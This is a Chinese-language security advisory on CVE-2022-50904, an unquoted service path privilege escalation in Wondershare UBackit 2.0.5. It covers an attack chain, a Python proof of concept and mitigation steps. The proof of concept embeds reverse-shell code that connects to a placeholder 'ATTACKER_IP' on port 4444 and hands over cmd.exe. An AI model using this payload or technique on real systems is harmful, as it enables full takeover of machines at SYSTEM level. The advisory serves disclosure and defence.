CVE-2022-50904: Wondershare UBackit 未引用服务路径权限提升漏洞

漏洞信息

漏洞编号

CVE-2022-50904

漏洞类型

未引用服务路径权限提升

CVSS评分

8.4 高危

攻击向量

本地 (AV:L)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Wondershare UBackit 2.0.5

漏洞概述

CVE-2022-50904是Wondershare公司开发的UBackit 2.0.5备份软件中存在的一个高危本地权限提升漏洞。该漏洞源于wsbackup服务的可执行文件路径未使用引号包裹，导致Windows服务在启动时存在路径解析歧义。攻击者可以利用这一特性，在服务路径的中间目录中植入恶意可执行文件，当服务重启时，Windows会优先执行该恶意程序，从而使攻击者以LocalSystem最高权限在目标系统上执行任意代码。此漏洞CVSS评分高达8.4，属于高危级别，对系统安全构成严重威胁。由于攻击向量为本地且无需认证，攻击者只需获得目标系统的普通用户访问权限即可实施攻击，成功后可完全控制整个系统。

技术细节

未引用服务路径漏洞(Unquoted Service Path)是一种经典的Windows权限提升技术。在Windows服务配置中，如果服务可执行文件的路径包含空格且未使用双引号包裹，系统在解析路径时会从左到右依次尝试执行每个空格分隔的路径部分。例如，如果服务路径为C:\Program Files\Wondershare\UBackit\wsbackup.exe，系统会依次尝试执行：C:\Program.exe、C:\Program Files\Wondershare.exe、C:\Program Files\Wondershare\UBackit.exe，最后才会正确执行完整路径。攻击者只需在C:\Program.exe位置放置恶意可执行文件，即可利用Windows服务启动时的路径解析顺序，在服务重启时以LocalSystem权限执行恶意代码。Wondershare UBackit的wsbackup服务存在此问题，攻击者可通过文件系统写入权限在相应目录植入恶意程序，等待服务重启或通过其他方式触发服务重启即可实现权限提升。

攻击链分析

STEP 1

信息收集

攻击者首先获取目标系统的普通用户访问权限，并识别系统中安装的Wondershare UBackit软件及其版本信息

STEP 2

漏洞识别

使用sc qc命令查询wsbackup服务的配置信息，确认服务路径是否存在未引用问题，以及当前用户对该路径目录是否具有写入权限

STEP 3

恶意程序准备

攻击者准备恶意可执行文件，通常为反向shell、远程控制木马或具备其他恶意功能的程序

STEP 4

植入恶意程序

将恶意可执行文件放置在服务路径的中间目录位置，如将恶意程序重命名为Program.exe并放置在C:\根目录

STEP 5

触发服务重启

等待系统更新、计划任务或其他触发条件导致wsbackup服务重启，或主动利用系统漏洞诱导管理员重启服务

STEP 6

权限提升

当服务启动时，Windows因路径未加引号而优先执行C:\Program.exe，攻击者的恶意程序以LocalSystem最高权限运行

STEP 7

持久化控制

攻击者在目标系统上建立持久化控制，可能安装后门、窃取敏感数据或进一步横向移动

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2022-50904 PoC - Wondershare UBackit Unquoted Service Path
# This PoC demonstrates how to exploit the unquoted service path vulnerability
# to escalate privileges to LocalSystem

import os
import subprocess
import shutil

def check_vulnerability():
    """Check if the target system is vulnerable"""
    service_name = "wsbackup"
    service_path = r"C:\Program Files\Wondershare\UBackit\wsbackup.exe"
    
    # Check if service exists and path is unquoted
    try:
        result = subprocess.run(
            ['sc', 'qc', service_name],
            capture_output=True,
            text=True
        )
        if 'BINARY_PATH_NAME' in result.stdout:
            print(f"[+] Service '{service_name}' found")
            print(f"[+] Service path: {service_path}")
            return True
    except Exception as e:
        print(f"[-] Error checking service: {e}")
    return False

def create_malicious_executable():
    """Create a malicious executable that will run as LocalSystem"""
    # Create a reverse shell payload or other malicious code
    malicious_code = '''
import socket
import subprocess
import os

# Create reverse shell connection
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("ATTACKER_IP", 4444))

# Redirect stdin/stdout/stderr to socket
os.dup2(s.fileno(), 0)
os.dup2(s.fileno(), 1)
os.dup2(s.fileno(), 2)

# Execute command shell
subprocess.call(["cmd.exe"])
'''
    
    # In real scenario, compile to executable
    # This is a simplified demonstration
    print("[+] Malicious executable would be created here")
    return True

def exploit():
    """Exploit the unquoted service path vulnerability"""
    if not check_vulnerability():
        print("[-] Target is not vulnerable")
        return False
    
    # Create malicious executable in unquoted path location
    # Path: C:\Program.exe
    malicious_path = r"C:\Program.exe"
    
    try:
        # Create the malicious executable
        create_malicious_executable()
        
        # In real attack, place the executable at:
        # C:\Program.exe
        # When wsbackup service starts, it will execute this first
        
        print(f"[+] Malicious executable placed at: {malicious_path}")
        print("[+] Waiting for service restart...")
        print("[+] When service restarts, malicious code will execute as LocalSystem")
        
        return True
        
    except Exception as e:
        print(f"[-] Exploitation failed: {e}")
        return False

if __name__ == "__main__":
    print("CVE-2022-50904 - Wondershare UBackit Unquoted Service Path Exploit")
    print("=" * 60)
    exploit()

影响范围

Wondershare UBackit 2.0.5

防御指南

临时缓解措施

在官方补丁发布前，可通过以下措施临时缓解风险：1) 使用icacls命令限制C:\Program Files\Wondershare目录的写入权限，仅允许管理员和SYSTEM账户写入；2) 部署应用程序白名单策略，阻止非授权程序在敏感目录执行；3) 监控wsbackup服务的启动事件和异常进程创建行为；4) 考虑暂时禁用wsbackup服务直到官方修复版本发布；5) 实施最小权限原则，确保普通用户账户不具备系统目录的写入能力。